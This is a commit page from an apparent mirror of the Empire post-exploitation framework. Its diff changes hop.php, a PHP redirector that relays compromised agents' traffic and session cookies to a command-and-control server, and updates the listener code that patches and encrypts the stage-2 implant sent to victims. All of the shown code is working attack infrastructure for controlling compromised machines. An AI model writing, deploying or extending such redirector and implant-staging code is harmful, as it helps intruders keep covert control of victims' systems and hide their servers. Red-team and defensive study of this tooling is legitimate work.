infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix agent staging over http_hop listeners. 

Fixes issue #370.
mdns
mr64bit 2016-11-28 11:54:57 -05:00
parent 619ae2c132
commit 6c3f51aca9
3 changed files with 35 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
data/misc/hop.php
View File

@ -1,18 +1,22 @@
<?php <?php
$server = rtrim("REPLACE_SERVER", '/'); $server = rtrim("REPLACE_SERVER", '/');
$hopName = "REPLACE_HOP_NAME";
function do_get_request($url, $optionalHeaders = null) function do_get_request($url, $optionalHeaders = null)
{ {
global $hopName;
$aContext = array( $aContext = array(
'http' => array( 'http' => array(
'method' => 'GET' 'method' => 'GET'
), ),
); );
$headers = array('Hop-Name' => $hopName);
if ($optionalHeaders !== null) { if ($optionalHeaders !== null) {
$aContext['http']['header'] = $optionalHeaders; $headers['Cookie'] = $optionalHeaders;
} }
$aContext['http']['header'] = prepareHeaders($headers);
$cxContext = stream_context_create($aContext); $cxContext = stream_context_create($aContext);
echo file_get_contents($url, False, $cxContext); echo file_get_contents($url, False, $cxContext);
} }
@ -20,13 +24,16 @@ function do_get_request($url, $optionalHeaders = null)
function do_post_request($url, $data, $optionalHeaders = null) function do_post_request($url, $data, $optionalHeaders = null)
{ {
global $hopName;
$params = array('http' => array( $params = array('http' => array(
'method' => 'POST', 'method' => 'POST',
'content' => $data 'content' => $data
)); ));
$headers = array('Hop-Name' => $hopName);
if ($optionalHeaders !== null) { if ($optionalHeaders !== null) {
$params['http']['header'] = $optionalHeaders; $headers['Cookie'] = $optionalHeaders;
} }
$params['http']['header'] = prepareHeaders($headers);
$ctx = stream_context_create($params); $ctx = stream_context_create($params);
$fp = @fopen($url, 'rb', false, $ctx); $fp = @fopen($url, 'rb', false, $ctx);
if (!$fp) { if (!$fp) {
@ -39,11 +46,24 @@ function do_post_request($url, $data, $optionalHeaders = null)
echo $response; echo $response;
} }
function prepareHeaders($headers) {
$flattened = array();
foreach ($headers as $key => $header) {
if (is_int($key)) {
$flattened[] = $header;
} else {
$flattened[] = $key.': '.$header;
}
}
return implode("\r\n", $flattened);
}
if ($_SERVER['REQUEST_METHOD'] === 'GET') { if ($_SERVER['REQUEST_METHOD'] === 'GET') {
$requestURI = $_SERVER['REQUEST_URI']; $requestURI = $_SERVER['REQUEST_URI'];
if(isset($_COOKIE['session'])) { if(isset($_COOKIE['session'])) {
return do_get_request($server.$requestURI, "Cookie: session=".str_replace(' ', '+', $_COOKIE['session'])); return do_get_request($server.$requestURI, "session=".str_replace(' ', '+', $_COOKIE['session']));
} }
else { else {
return do_get_request($server.$requestURI); return do_get_request($server.$requestURI);
@ -56,7 +76,7 @@ else {
$postdata = file_get_contents("php://input"); $postdata = file_get_contents("php://input");
if(isset($_COOKIE['session'])) { if(isset($_COOKIE['session'])) {
return do_post_request($server.$requestURI, $postdata, "Cookie: session=".str_replace(' ', '+', $_COOKIE['session'])); return do_post_request($server.$requestURI, $postdata, "session=".str_replace(' ', '+', $_COOKIE['session']));
} }
else { else {
return do_post_request($server.$requestURI, $postdata); return do_post_request($server.$requestURI, $postdata);

10
lib/listeners/http.py
View File

@ -747,8 +747,16 @@ def send_message(packets=None):
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey'] sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http') dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py # step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions) agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode) encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet? # TODO: wrap ^ in a routing packet?

1
lib/listeners/http_hop.py
View File

@ -440,6 +440,7 @@ def send_message(packets=None):
f.close() f.close()
hopCode = hopCode.replace('REPLACE_SERVER', redirectHost) hopCode = hopCode.replace('REPLACE_SERVER', redirectHost)
hopCode = hopCode.replace('REPLACE_HOP_NAME', self.options['Name']['Value'])
saveFolder = self.options['OutFolder']['Value'] saveFolder = self.options['OutFolder']['Value']
for uri in uris: for uri in uris: